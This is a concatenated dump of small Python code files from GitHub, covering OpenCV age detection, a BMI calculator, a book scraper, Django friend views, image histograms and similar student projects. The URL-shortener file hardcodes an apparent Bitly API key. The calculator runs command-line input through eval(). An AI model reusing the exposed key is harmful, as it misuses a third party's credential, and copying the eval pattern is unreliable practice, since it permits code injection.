break\r\n\r\n if age > 17 or weight >= 80:\r\n club = 'Senior'\r\n else:\r\n club = 'Junior'\r\n \r\n print(name, club)","repo_name":"Yujun-Won/Algorithm","sub_path":"백준/Bronze/2083. 럭비 클럽/럭비 클럽.py","file_name":"럭비 클럽.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11671009247","text":"import cv2\nfrom PIL import Image\nimport argparse #ArgumentParser사용하기 위해\n\ndef highlightFace(net, frame, conf_threshold=0.7):\n frameOpencvDnn=frame.copy() #매개변수로 받은 frame을 copy함\n frameHeight=frameOpencvDnn.shape[0] #frameOpencvDnn의 전체 행의 갯수=>Height에 저장\n frameWidth=frameOpencvDnn.shape[1] ##frameOpencvDnn의 전체 열의 갯수=>Width에 저장\n\n #이미지 전처리\n blob=cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)\n net.setInput(blob) #네트워크 입력설정 모델에 들어가는 input\n detections=net.forward()#정방향실행\n\n faceBoxes=[] #배열 선언\n #얼굴탐지\n for i in range(detections.shape[2]): #여러명이 있을수 있으므로 반복문\n confidence=detections[0,0,i,2]\n\n if confidence>conf_threshold:\n x1=int(detections[0,0,i,3]*frameWidth)\n y1=int(detections[0,0,i,4]*frameHeight)\n x2=int(detections[0,0,i,5]*frameWidth)\n y2=int(detections[0,0,i,6]*frameHeight)\n\n faceBoxes.append([x1,y1,x2,y2])#배열에\n\n #얼굴구간 네모 박스\n cv2.rectangle(frameOpencvDnn, (x1,y1), (x2,y2), (0,255,0), int(round(frameHeight/150)), 8)\n return frameOpencvDnn,faceBoxes\n\n\nparser=argparse.ArgumentParser() #인자값 받을수 있는 인스턴스 생성\nparser.add_argument('--image') #입력받을 인자값 등록 :\n\nargs=parser.parse_args() #인자값 args에 저장\n\nfaceProto=\"opencv_face_detector.pbtxt\"\nfaceModel=\"opencv_face_detector_uint8.pb\"\n\n#age_deploy는 텐서플로우, age_net은 카페// 예측모델 불러오기\nageProto=\"age_deploy.prototxt\"\nageModel=\"age_net.caffemodel\"\n\n# 사전에 학습된 가중치 파일 불러오기(경험적 최적값)\nMODEL_MEAN_VALUES=(78.4263377603, 87.7689143744, 114.895847746)\n\n# 배열의 저장\nageList=['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']\n\n#cv2.dnn_net 클래스 객체 생성\n#훈련된 가중치를 저장하고 있는 이진파일이름: faceNodel,명시적 딥러닝 프레임워크이름:faceproto\nfaceNet=cv2.dnn.readNet(faceModel,faceProto)\nageNet=cv2.dnn.readNet(ageModel,ageProto)\n\nvideo=cv2.VideoCapture(args.image if args.image else 0) #VideoCapture(0 또는 1)->실시간 frame을 받앙옴\npadding=20\nchild=0\nadult=0\nold=0\n\nendbreak=True\nwhile cv2.waitKey(1)<0: #키 입력 대기시간\n hasFrame,frame=video.read()\n if not hasFrame:\n cv2.waitKey()\n break\n\n resultImg,faceBoxes=highlightFace(faceNet,frame) #함수 호출\n if not faceBoxes:\n print(\"No face detected\")\n\n for faceBox in faceBoxes:\n #얼굴이미지 추출\n face=frame[max(0,faceBox[1]-padding):min(faceBox[3]+padding,frame.shape[0]-1),\n max(0,faceBox[0]-padding):min(faceBox[2]+padding, frame.shape[1]-1)]\n\n blob=cv2.dnn.blobFromImage(face, 1.0, (227,227), MODEL_MEAN_VALUES, swapRB=False)\n # 연령 예측을 위한 이미지 변환 맟 전처리\n # 입력 영상을 블롭 객체로 만들어서 추론해야함( 모델파일이 어떻게 학습되었는지 파악하고 알맞게 지정)\n # 블롭객체=cv2.dnn.blobFromImage(입력영상,입력 영상의 픽셀에 곱할값, 입력 영상 각 채널에서 뺄 평균 값(경험적 학습값) ,r과 g의 값을 바꿀것인지)\n\n # 나이 예측\n ageNet.setInput(blob) #네트워크 입력 설정\n agePreds=ageNet.forward() #정방향 실행\n age=ageList[agePreds[0].argmax()]# 가장 높은 score값 선정\n print(f'age: {age[1:-1]} years') #문자열 만들기 위한 f'\n\n #cv2.puttext(이미지파일, 출력할 문자, ,크기와 글꼴, 0.8,(0,255,255) , 글짜 두께, 선 표시 방법)\n # 예측된 정보를 테두리 안에 입력\n cv2.putText(resultImg, f'{age}', (faceBox[0], faceBox[1]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,255,255), 2, cv2.LINE_AA)\n #이미지 화면 출력(파일창 이름, 파일명)\n cv2.imshow(\"Detecting age\", resultImg)\n\n#예측값 count\n if f'{age}' == '(0-2)' or f'{age}' == '(4-6)' or f'{age}' == '(8-12)':\n print(\"age---------------어린이\")\n child+=1\n elif f'{age}' == '(15-20)' or f'{age}' == '(25-32)' or f'{age}' == '(38-43)' or f'{age}' == '(48-53)':\n print(\"age---------------성인\")\n adult+=1\n else:\n print(\"age---------------노년층\")\n old+=1\n\n#10번 이상 같은 예측값이 나왔을때\n if child>15 or adult>15 or old>15:\n if child>10:\n path1 = './어린이선택.png'\n path2 = './어린이메뉴.png'\n print(\"판독 결과: 어린이입니다\")\n endbreak=False\n break\n\n elif adult>10:\n path1 = './성인선택.png'\n path2 = './성인메뉴.png'\n print(\"판독 결과: 성인입니다\")\n endbreak=False\n break\n\n else:\n path1 = './노인선택.png'\n path2 = './노인메뉴.png'\n print(\"판독 결과: 노인입니다\")\n endbreak=False\n break\n\n if(endbreak==False):\n break\n\n#맞춤 화면 띄움\n\nim1 = Image.open(path1)\nim1.show()\nim2 = Image.open(path2)\nim2.show()\n\n","repo_name":"ubeeni/sk_labs","sub_path":"age detection kiosque/gad.py","file_name":"gad.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19290571431","text":"'''\r\nEste es un programa que calcula el indice de masa corporal\r\nLenguage python\r\ncreated by: Jhon Fernando Moreno Ramírez\r\n'''\r\n\r\nimport sys\r\nfrom PyQt5 import uic\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QDialog, QMessageBox\r\n\r\nclass ejemplo_GUI(QMainWindow):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n uic.loadUi(\"GUI/principal.ui\",self)\r\n self.btnCalcular.clicked.connect(self.calcular)\r\n \r\n def diagnostico(self,res):\r\n if res < 18.5:\r\n return 'EL paciente esta con peso bajo'\r\n elif res >=18.5 and res < 25:\r\n return 'El paciente presenta peso normal'\r\n elif res >=25 and res < 30:\r\n return 'El paciente presenta sobrepeso'\r\n else:\r\n return 'El paciente se encuentra en estado de obesidad'\r\n \r\n def calcular(self):\r\n est=self.textEstatura.text()\r\n pes=self.textPeso.text()\r\n opc=self.comboBoxSeleccionar.currentText()\r\n if est =='' or pes == '':\r\n #diag=dialogo(self)\r\n #diag.show()\r\n QMessageBox.about(self,\"Error\",\"Las casillas NO pueden estar vacias\")\r\n elif opc=='cm y Kg':\r\n cm=float(est)\r\n kg=float(pes)\r\n imc=kg/((cm/100)**2)\r\n diag=self.diagnostico(imc)\r\n frase='Su indice Masa corporal es :'+str(imc)+'Su diagnostico es '+diag\r\n \r\n print(\"palabra frase \",type(frase))\r\n self.resultado.setPlaceholderText(str(frase))\r\n elif opc=='pul y libras':\r\n pul=float(est)\r\n libras=float(pes)\r\n imc=(libras/(pul)**2)*703\r\n diag=self.diagnostico(imc)\r\n frase='Su indice Masa corporal es :'+str(imc)+'Su diagnostico es '+diag\r\n self.resultado.setPlaceholderText(str(frase))\r\n\r\nclass dialogo(QDialog):\r\n def __init__(self ,*args, **kwargs):\r\n super(dialogo,self).__init__(*args, **kwargs)\r\n self.setWindowTitle(\"Soy un popup\")\r\n self.setFixedSize(200, 100)\r\n \r\n \r\nif __name__=='__main__':\r\n app = QApplication(sys.argv)\r\n GUI = ejemplo_GUI()\r\n GUI.show()\r\n sys.exit(app.exec_())","repo_name":"jhonfernandomoreno/imc","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22440838505","text":"#8e49668ea2fac42e2214eb6799cddcb313fa71cf\nfrom pyshorteners import Shortener\n\nAPI_KEY='8e49668ea2fac42e2214eb6799cddcb313fa71cf'\n\nobj = Shortener(api_key = API_KEY)\n\nlong_url=\"https://www.google.com/search?q=wallpaper&tbm=isch&hl=en&chips=q:wallpaper,g_1:galaxy:gHxkaGWDx2M%3D&sa=X&ved=2ahUKEwi9i-bFoZDzAhVC0nMBHV4gDXoQ4lYoBnoECAEQHA&biw=771&bih=661#imgrc=yIGiED8WIxN3lM\"\n\nshort_url= obj.bitly.short(long_url)\n\nprint(short_url)\n\nLong_url = obj.bitly.expand(short_url)\n\n# print(Long_url)","repo_name":"archijaiswal/Python","sub_path":"URL shortener.py","file_name":"URL shortener.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21009572980","text":"import logging\n\nfrom opendnssec_autorollover.handlers import Handler, register_handler\n\nlogger = logging.getLogger(__name__)\n\n@register_handler('null')\nclass NullHandler(Handler):\n def run(self, changes):\n logger.debug('ignoring changes for zone %s', self.zone)\n","repo_name":"julianbrost/opendnssec-autorollover","sub_path":"src/opendnssec_autorollover/handlers/null.py","file_name":"null.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"23170648866","text":"\"\"\"Add test fullPath\n\nRevision ID: a15291c68df0\nRevises: a6ab9b8e37b1\nCreate Date: 2023-02-27 09:06:11.562537\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a15291c68df0'\ndown_revision = 'a6ab9b8e37b1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('tests', sa.Column('fullPath', sa.String(length=2048), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('tests', 'fullPath')\n # ### end Alembic commands ###\n","repo_name":"David1906/Xandra","sub_path":"alembic/versions/a15291c68df0_add_test_fullpath.py","file_name":"a15291c68df0_add_test_fullpath.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7200110977","text":"# Introduction to Bioinformatics 2019/20\r\n# 7 - Nucleotides\r\nfrom h_read import FileReader\r\n\r\n\r\nclass Nucleotides:\r\n\r\n def __init__(self):\r\n self.data = FileReader('dataset.txt')\r\n self.data_list = self.data.e_read()\r\n self.A = 0\r\n self.C = 0\r\n self.G = 0\r\n self.T = 0\r\n\r\n # counts the nucleotides and\r\n def count_nucleotides(self):\r\n try:\r\n for nucleotide in self.data_list[0]: # Iterate through nucleotides\r\n if nucleotide == 'A':\r\n self.A += 1\r\n elif nucleotide == 'C':\r\n self.C += 1\r\n elif nucleotide == 'G':\r\n self.G += 1\r\n elif nucleotide == 'T':\r\n self.T += 1\r\n return True\r\n except Exception as e:\r\n print('Exception occurred while creating the output; ' + str(e))\r\n\r\n def create_output(self):\r\n try:\r\n output = [self.A, self.C, self.G, self.T]\r\n self.data.write_to_file_7('output_7_file.txt', output)\r\n return '[OK]'\r\n except Exception as e:\r\n print('Exception occurred while creating the output; ' + str(e))\r\n return '[ERROR]'\r\n\r\n\r\nif __name__ == '__main__':\r\n nc = Nucleotides()\r\n nc.count_nucleotides()\r\n print(nc.create_output())\r\n","repo_name":"KlemenKrenker/SchoolProjects","sub_path":"Introduction to BioInformatics/7_Nucleotides.py","file_name":"7_Nucleotides.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26743332019","text":"import re\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nclass BookScrape:\r\n def __init__(self):\r\n self.url_main=\"https://books.toscrape.com/\"\r\n self.topics=self.get_topic(self.url_main)\r\n print(\"To retrieve a list of books under a topic Press \\'1\\'. \\nTo retrieve price of a book price \\'2\\'\")\r\n op_no=int(input('Enter number here: '))\r\n if op_no==1:\r\n self.get_topic_list()\r\n elif op_no ==2:\r\n self.book_price()\r\n else:\r\n print('You have entered an invalid input')\r\n\r\n def url_content(self,url):\r\n try:\r\n html = requests.get( url ).content\r\n except:\r\n print(\"Failed Internet Connection\")\r\n html_parse=BeautifulSoup(html,'html.parser')\r\n return html_parse\r\n\r\n\r\n def get_list_pages(self,url): \r\n def get_list(url): \r\n tags= self.url_content(url).findAll('h3') \r\n return tags\r\n \r\n count=2\r\n url_list=get_list(url)\r\n tag_pages=[]\r\n tag_pages+=url_list \r\n while url_list !=[]:\r\n url2=url.replace(\"index.html\",'page-'+str(count)+'.html')\r\n url_list=get_list(url2)\r\n tag_pages+=url_list \r\n count+=1\r\n books=\"\"\r\n book_ref=[]\r\n for i in tag_pages: \r\n books+=str(i.find('a')['title'])+'\\n'\r\n book_ref.append(i)\r\n return books, book_ref\r\n\r\n\r\n def get_topic(self,url): \r\n tags=self.url_content(url).find('ul', attrs={'class':\"nav nav-list\"}).find('ul').find_all('li') \r\n return tags\r\n \r\n def get_topic_list(self):\r\n b_list={}\r\n count =1\r\n topic_count=[] \r\n for i in self.topics:\r\n topic=i.text.strip()\r\n topic_count.append(count)\r\n print(str(count)+'. ',topic) \r\n b_list[count]=[topic, i.find('a')['href']]\r\n count+=1\r\n\r\n print(\"Select serial no of topic to view book records\")\r\n b=int(input('Enter number here: '))\r\n\r\n if b >=min(topic_count) and b <=max(topic_count):\r\n sel_url=self.url_main+b_list[b][1] \r\n print(\"Find below list of books for \", b_list[b][0],\"\\n\")\r\n \r\n books,_=self.get_list_pages(sel_url)\r\n print(books) \r\n else: \r\n print('Invalid Input')\r\n\r\n\r\n def get_price(self,url):\r\n tags=self.url_content(url).find('p', attrs={'class':'price_color'}).text \r\n return tags\r\n \r\n\r\n def book_price(self):\r\n topic_input=input('enter name of topic: ')\r\n book_input=input('enter book title: ')\r\n\r\n\r\n topic_search={}\r\n for i in self.topics:\r\n topic=str(i.text.strip())\r\n if topic_input.lower() in topic.lower():\r\n topic_search[topic]=i.find('a')['href']\r\n if topic_search !={}:\r\n\r\n result=[]\r\n for topic, link in topic_search.items():\r\n s_url=self.url_main+link\r\n books, book_ref=self.get_list_pages(s_url)\r\n books=books.split('\\n')\r\n for book, ref in zip(books,book_ref):\r\n if book_input.lower() in book.lower():\r\n j= re.sub('\\../',\"\",ref.find('a')['href'])\r\n j=\"https://books.toscrape.com/catalogue/\"+j\r\n price=self.get_price(j)\r\n result.append([book,price])\r\n\r\n if result !=[]:\r\n print('Here are the prices of book(s) from your search input')\r\n for i in result:\r\n print('The price of book \\''+str(i[0])+'\\' is '+str(i[1]))\r\n else:\r\n print('No item matching your book input')\r\n\r\n else:\r\n print('No item matching your topic input')\r\n\r\n\r\nBookScrape()","repo_name":"Tofunmi-creator/samples","sub_path":"Web Scraper (Online Books)/webbookscrape.py","file_name":"webbookscrape.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39573273650","text":"import re\r\n\r\nclass SqlFormatter(object):\r\n input_path = \"\"\r\n report_name = \"\"\r\n line = \"\"\r\n database = \"\"\r\n commonReplacement = {}\r\n wordsToFind = {}\r\n lastClean = {}\r\n\r\n def __init__(self, input_path, report_name, database):\r\n self.input_path = input_path\r\n self.report_name = report_name\r\n self.database = database\r\n self.commonReplacement = {'spark.sql(\"': '', '\");': ';', '\" + database + \"': f'{self.database}', r'\\n': ' ', r'\\t': ' ', ' ,': ',', }\r\n self.wordsToFind = {'select ': 'select\\n\\t', ', ': ',\\n\\t', ',': ',\\n\\t', ' then ': '\\n\\t\\tthen ', ' else ': '\\n\\t\\telse ', 'end': '\\n\\tend', 'from': '\\nfrom', 'inner': '\\ninner', 'left': '\\nleft', 'rigth': '\\nrigth', 'join': '\\njoin', ' on ': '\\n\\ton ', ' on(': '\\n\\ton(', ' and ': '\\n\\tand ', ' where ': '\\nwhere ', ' order ': '\\norder ', '\\n\\t\\n\\t': '\\n\\t', '\\n\\n': '\\n' } \r\n self.lastClean = {'left \\njoin': 'left join', 'rigth \\njoin': 'rigth join', 'inner \\njoin': 'inner join', 'outer \\njoin': 'outer join'}\r\n\r\n def format(self):\r\n sql_file_name = f'{self.report_name}.sql'\r\n with open(self.input_path, 'r') as f:\r\n lines = f.readlines()\r\n\r\n for line in lines:\r\n with open(sql_file_name, 'a') as o:\r\n o.write(self.replace(line) + f'\\n---------------------------------------------------------------\\n')\r\n \r\n self.printTables(sql_file_name, self.report_name)\r\n \r\n def replace(self, line):\r\n line = line.lower()\r\n\r\n #Common replacement for cleaning tabs, doble spaces and lines breaks\r\n for x, y in self.commonReplacement.items():\r\n line = line.replace(x, y)\r\n\r\n while line.count(' ') :\r\n line = line.replace(' ', ' ')\r\n\r\n for x, y in self.wordsToFind.items():\r\n line = line.replace(x, y)\r\n\r\n for x, y in self.lastClean.items():\r\n line = line.replace(x, y)\r\n\r\n return line\r\n\r\n def printTables(self, input_file, output_file):\r\n tables = []\r\n with open(input_file, 'r') as f:\r\n lines = f.readlines()\r\n\r\n for line in lines:\r\n line = line.lower()\r\n table = re.search(r\"(from|join) (\\w+.\\w+)\", line)\r\n \r\n if(table):\r\n tables.append(table.group(2))\r\n \r\n tables.sort()\r\n tables = list(dict.fromkeys(tables))\r\n\r\n with open(f'{output_file}-tables.txt', 'a') as f:\r\n for x in tables:\r\n f.write(f'{x}\\n')\r\n\r\nformatter = SqlFormatter(\"input.txt\", \"caratula_per\", \"zdm_ssso\")\r\nformatter.format()","repo_name":"facundo94/sqlFormatter","sub_path":"SlqFormatter.py","file_name":"SlqFormatter.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42126153593","text":"import sys\n\ntry:\n # cut first element(name of the file)\n # there we pick our operation(1 input) from command line\n arithmetic_operations = sys.argv[1]\n # here we take all the numbers on which the operation will be performed\n expression = sys.argv[2:]\n # create a dict to make add, sub, multi and div keys to a sign\n arithmetic = {\"add\": \"+\",\n \"sub\": \"-\",\n \"multi\": \"*\",\n \"div\": \"/\"}\n # We use join to make our expression a string with\n # spaces and then using the function eval\n print(eval(arithmetic[arithmetic_operations].join(sys.argv[2:])))\nexcept ZeroDivisionError:\n print(\"Attempt to divide a number by zero\")\nexcept IndexError:\n print(\"Incorrect input! Index error, try again\")\nexcept NameError:\n print(\"Incorrect input! Name error, try again\")\nexcept KeyError:\n print(\"Incorrect input! The first argument should be: add, div, multi or sub\")\nexcept SyntaxError:\n print(\"Invalid syntax!\")\nexcept EOFError or KeyboardInterrupt:\n print(\"Error, incorrect input! Try again.\")\n\n","repo_name":"Alekssin1/first_lab_OOP","sub_path":"second_task.py","file_name":"second_task.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72301918133","text":"from django.shortcuts import render, redirect\nfrom session_register_app.models import *\n\ndef show_friends(request):\n val = request.session.get('id')\n u = Users.objects.filter(id=val)\n if u:\n context = {\n 'user': u[0],\n 'amigos':u[0].friends.all(),\n 'no_amigos':Users.objects.exclude(friends2__u_id__id=u[0].id),\n }\n # if not context['amigos']:\n # context['no_amigos'] = Users.objects.all().exclude(id=u[0].id)\n # else:\n # context['no_amigos'] = Users.objects.exclude(all__friend__id=u[0].id)\n return render(request,'friends.html', context)\n return redirect('/main')\n\ndef add_friend(request, num):\n val = request.session.get('id')\n u = Users.objects.filter(id=val)\n f = Users.objects.filter(id=num)\n if u and f:\n friend = f[0]\n user = u[0]\n Friends.objects.create(u_id=user, friend_id=friend)\n Friends.objects.create(u_id=friend, friend_id=user)\n return redirect('/friends')\n\ndef remove_friend(request, num):\n val = request.session.get('id')\n u = Users.objects.filter(id=val)\n f = Users.objects.filter(id=num)\n if u and f:\n friend = f[0]\n user = u[0]\n fr=Friends.objects.filter(u_id=user, friend_id=friend)\n fr2=Friends.objects.filter(u_id=friend, friend_id=user)\n fr.delete()\n fr2.delete()\n return redirect('/friends')\n\ndef show_user(request, num):\n val = request.session.get('id')\n u = Users.objects.filter(id=val)\n user = Users.objects.filter(id=num)\n if u and user:\n context = {\n 'user': user[0]\n }\n return render(request,'show_user.html', context)\n return redirect('/main')\n\n","repo_name":"Diego-LC/friends","sub_path":"friends_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12486993936","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n#Delete a single object based on it's bounding box information etc in the xml.\n \nimport os\nimport xml.etree.ElementTree as ET\n \norigin_ann_dir = 'xmls/' #xmls input path\nnew_ann_dir = 'new_xmls/' #xmls output path\n \nfor dirpaths, dirnames, filenames in os.walk(origin_ann_dir):\n for filename in filenames:\n if os.path.isfile(r'%s%s' %(origin_ann_dir, filename)):\n origin_ann_path = os.path.join(r'%s%s' %(origin_ann_dir, filename))\n new_ann_path = os.path.join(r'%s%s' %(new_ann_dir, filename))\n tree = ET.parse(origin_ann_path)\n \n root = tree.getroot()\n for obj in root.findall(\"object\"):\n bndbox = obj.find(\"bndbox\")\n xmin = int(bndbox.find(\"xmin\").text)\n xmax = int(bndbox.find(\"xmax\").text)\n ymin = int(bndbox.find(\"ymin\").text)\n ymax = int(bndbox.find(\"ymax\").text)\n\n #if xmin ==0 or xmax==0 or ymin ==0 or ymax ==0:\n # root.remove(obj)\n \n if xmin > xmax or ymin > ymax ==0:\n root.remove(obj)\n\n\n\n tree.write(new_ann_path)\n","repo_name":"MuhammadAsadJaved/Important-shells","sub_path":"Delete_single_object.py","file_name":"Delete_single_object.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"8225649174","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\nCreated on 1/05/2011\n\n@author: Carlos Daniel Sanchez Ramirez \n@web: https://github.com/ErunamoJAZZ/Visor-Unal\n'''\n\nimport Image, wx, cv, os\n\n\n\nclass ImagenActual():\n '''\n Guarda la imagen actual y su versión en escala de grises.\n Estas imagenes están en formato PIL.\n Guarda tambien el Frame padre, para poder montar las imagenes\n en ventanas.\n '''\n def SetPadre(self, padr):\n self.padre = padr\n \n def SetImagenActual(self, imgAct):\n self.ImagenActual = imgAct\n self.img_gray = imgAct.convert('L')\n \n \n def openImage(self, event):\n dlg = wx.FileDialog(None, message=u\"Seleccione un archivo de texto\",\n defaultDir=os.path.expanduser('~'), defaultFile=\".txt\",\n style=wx.OPEN | wx.CHANGE_DIR )\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.ImagenActual = Image.open( unicode( path.replace('\\\\','/') ) ).convert('RGB')\n dlg.Destroy()\n \n #Aquí se carga la imagen en el GUI\n #padre.bitmap_1= wx.StaticBitmap(padre.panel_para_img, -1, pilToBitmap( ImagenActual< ))\n self.padre.cargarImg(pilToBitmap( self.ImagenActual ))\n self.img_gray = self.ImagenActual.convert('L')\n\n\n\nImgActual = ImagenActual()\n\n\n\n\n\n\n'''\nPIL Image to wx.Image.\n@from: http://wiki.wxpython.org/WorkingWithImages\n'''\n#copy/paste para manejar imagenes PIL & wxImage\ndef bitmapToPil(bitmap):\n return imageToPil(bitmapToImage(bitmap))\n\ndef bitmapToImage(bitmap):\n return wx.ImageFromBitmap(bitmap)\n\ndef pilToBitmap(pil):\n return imageToBitmap(pilToImage(pil))\n\ndef pilToImage(pil):\n image = wx.EmptyImage(pil.size[0], pil.size[1])\n image.SetData(pil.convert('RGB').tostring())\n return image\n\ndef imageToPil(image):\n pil = Image.new('RGB', (image.GetWidth(), image.GetHeight()))\n pil.fromstring(image.GetData())\n return pil\n\ndef imageToBitmap(image):\n return image.ConvertToBitmap()\n#Fin del copy/paste\n\n\n'''\nPIL Image to OpenCV\n'''\ndef pil2cv_L(imgPIL):\n imgCV = cv.CreateImageHeader(imgPIL.size,cv.IPL_DEPTH_8U , 1)#cv.IPL_DEPTH_32F\n cv.SetData(imgCV, imgPIL.tostring() )\n return imgCV\n\ndef cv2pil(imgCV):\n imgPIL = Image.fromstring('L', cv.GetSize(imgCV), imgCV.tostring() )\n return imgPIL\n\n\n\n#==============================================================\n\n'''\nPseudo implementación de la función imhist() de matlab.\n'''\ndef imhist(imgPIL, acumulativo=False):\n '''\n imhist(imgPIL) -> (histImgPIL, histCV, AvgSdv)\n Resibe una imagen tipo PIL, y retorna una Tupla.\n Donde histImPIL es la imagen del histograma,\n histCV es el histograma crudo que hace OpenCV,\n y AvgSdv es una tupla con el valor medio y \n la desviación estandar.\n '''\n \n def drawHistogram(histograma, scaleX=1.0, scaleY=1.0):\n '''\n Dibuja una imagen para el histograma calculado\n '''\n #rescara el numero máximo de valores en el historial.\n (_, histMax, _, _) = cv.GetMinMaxHistValue(histograma)\n \n #crea la imagen base, y la pone negra.\n imgHist= cv.CreateImage( (scaleX*256, scaleY*64) , 8, 1)\n cv.Zero(imgHist)\n \n \n #dibuja todo el histograma\n for pix in range(0,255):\n histValue = cv.QueryHistValue_1D(histograma, pix)\n nextValue = cv.QueryHistValue_1D(histograma, pix+1)\n \n #Los puntos en python se representan como tuplas :)\n pt1 = (pix*scaleX, 64*scaleY)\n pt2 = (pix*scaleX+scaleX, 64*scaleY)\n pt3 = (pix*scaleX+scaleX, (64-nextValue*64/histMax)*scaleY)\n pt4 = (pix*scaleX, (64-histValue*64/histMax)*scaleY)\n \n #se hace una lista de tuplas\n pts = [pt1, pt2, pt3, pt4]\n \n #se dubuja con el color 255\n cv.FillConvexPoly(imgHist, pts, 255)\n \n #finalmente, se retorna la imagen(imgCV) del histograma ya dibujado. \n return imgHist\n \n def drawHistogramAccum(histograma, scaleX=1.0, scaleY=1.0):\n '''\n Dibuja una imagen del histograma acumulativo calculado\n '''\n #rescara el numero máximo de valores en el historial.\n #(_, histMax, _, _) = cv.GetMinMaxHistValue(histograma)\n #Una lista con los valore del histograma acumulado\n newHist=[]\n acumulacion=0.0\n for i in range(0,256):\n acumulacion = acumulacion + cv.QueryHistValue_1D(histograma, i)\n newHist.append(acumulacion)\n #para obtener el tamaño máximo luego con sort\n aux=[]\n aux[:]= newHist[:]\n aux.sort()\n histMax= aux[-1]\n \n \n #crea la imagen base, y la pone negra.\n imgHist= cv.CreateImage( (scaleX*256, scaleY*64) , 8, 1)\n cv.Zero(imgHist)\n \n \n #dibuja todo el histograma\n for pix in range(0,255):\n histValue = newHist[pix] #(histograma, pix)\n nextValue = newHist[pix+1]#cv.QueryHistValue_1D(histograma, pix+1)\n \n #Los puntos en python se representan como tuplas :)\n pt1 = (pix*scaleX, 64*scaleY)\n pt2 = (pix*scaleX+scaleX, 64*scaleY)\n pt3 = (pix*scaleX+scaleX, (64-nextValue*64/histMax)*scaleY)\n pt4 = (pix*scaleX, (64-histValue*64/histMax)*scaleY)\n \n #se hace una lista de tuplas\n pts = [pt1, pt2, pt3, pt4]\n \n #se dubuja con el color 255\n cv.FillConvexPoly(imgHist, pts, 255)\n \n #finalmente, se retorna la imagen(imgCV) del histograma ya dibujado. \n return imgHist\n \n #===================\n #creación del histograma vacío (es como un array)\n rangos = [[0,255]]\n hist = cv.CreateHist([256], cv.CV_HIST_ARRAY, rangos, 1)\n \n #pasar de pil a cv\n src= pil2cv_L(imgPIL)\n \n #calculando el histograma\n cv.CalcHist([cv.GetImage(src)] , hist, 0) \n \n #=== FINAL ===\n #retorna Tupla (imgPIL, histCV, AvgSdv), este ultimo, es el valor medio y la desviación estandar\n if not acumulativo:\n return (cv2pil( drawHistogram(hist,2,5) ), hist, cv.AvgSdv(cv.GetImage(src)))\n else:\n return (cv2pil( drawHistogramAccum(hist,2,5) ), hist, cv.AvgSdv(cv.GetImage(src)))\n \n#==============================================================","repo_name":"ErunamoJAZZ/Visor-Unal","sub_path":"src/EngineGlobal.py","file_name":"EngineGlobal.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6793842789","text":"# import the necessary packages\nimport imutils\nimport cv2\nimport numpy as np\nfrom collections import namedtuple\nimport numpy as np\nimport cv2\n\ndef pyramid(image, scale=1.5, minSize=(30, 30)):\n\t# yield the original image\n\tyield image\n\n\t# keep looping over the pyramid\n\twhile True:\n\t\t# compute the new dimensions of the image and resize it\n\t\tw = int(image.shape[1] / scale)\n\t\timage = imutils.resize(image, width=w)\n\n\t\t# if the resized image does not meet the supplied minimum\n\t\t# size, then stop constructing the pyramid\n\t\tif image.shape[0] < minSize[1] or image.shape[1] < minSize[0]:\n\t\t\tbreak\n\n\t\t# yield the next image in the pyramid\n\t\tyield image\n\ndef sliding_window(image, stepSize, windowSize):\n\t# slide a window across the image\n\tfor y in xrange(0, image.shape[0], stepSize):\n\t\tfor x in xrange(0, image.shape[1], stepSize):\n\t\t\t# yield the current window\n\t\t\tyield (x, y, image[y:y + windowSize[1], x:x + windowSize[0]])\n\ndef orientations(image):\n\n\trows,cols = image.shape\n\tfor theta in range(0, 360, 45):\n\t\tM = 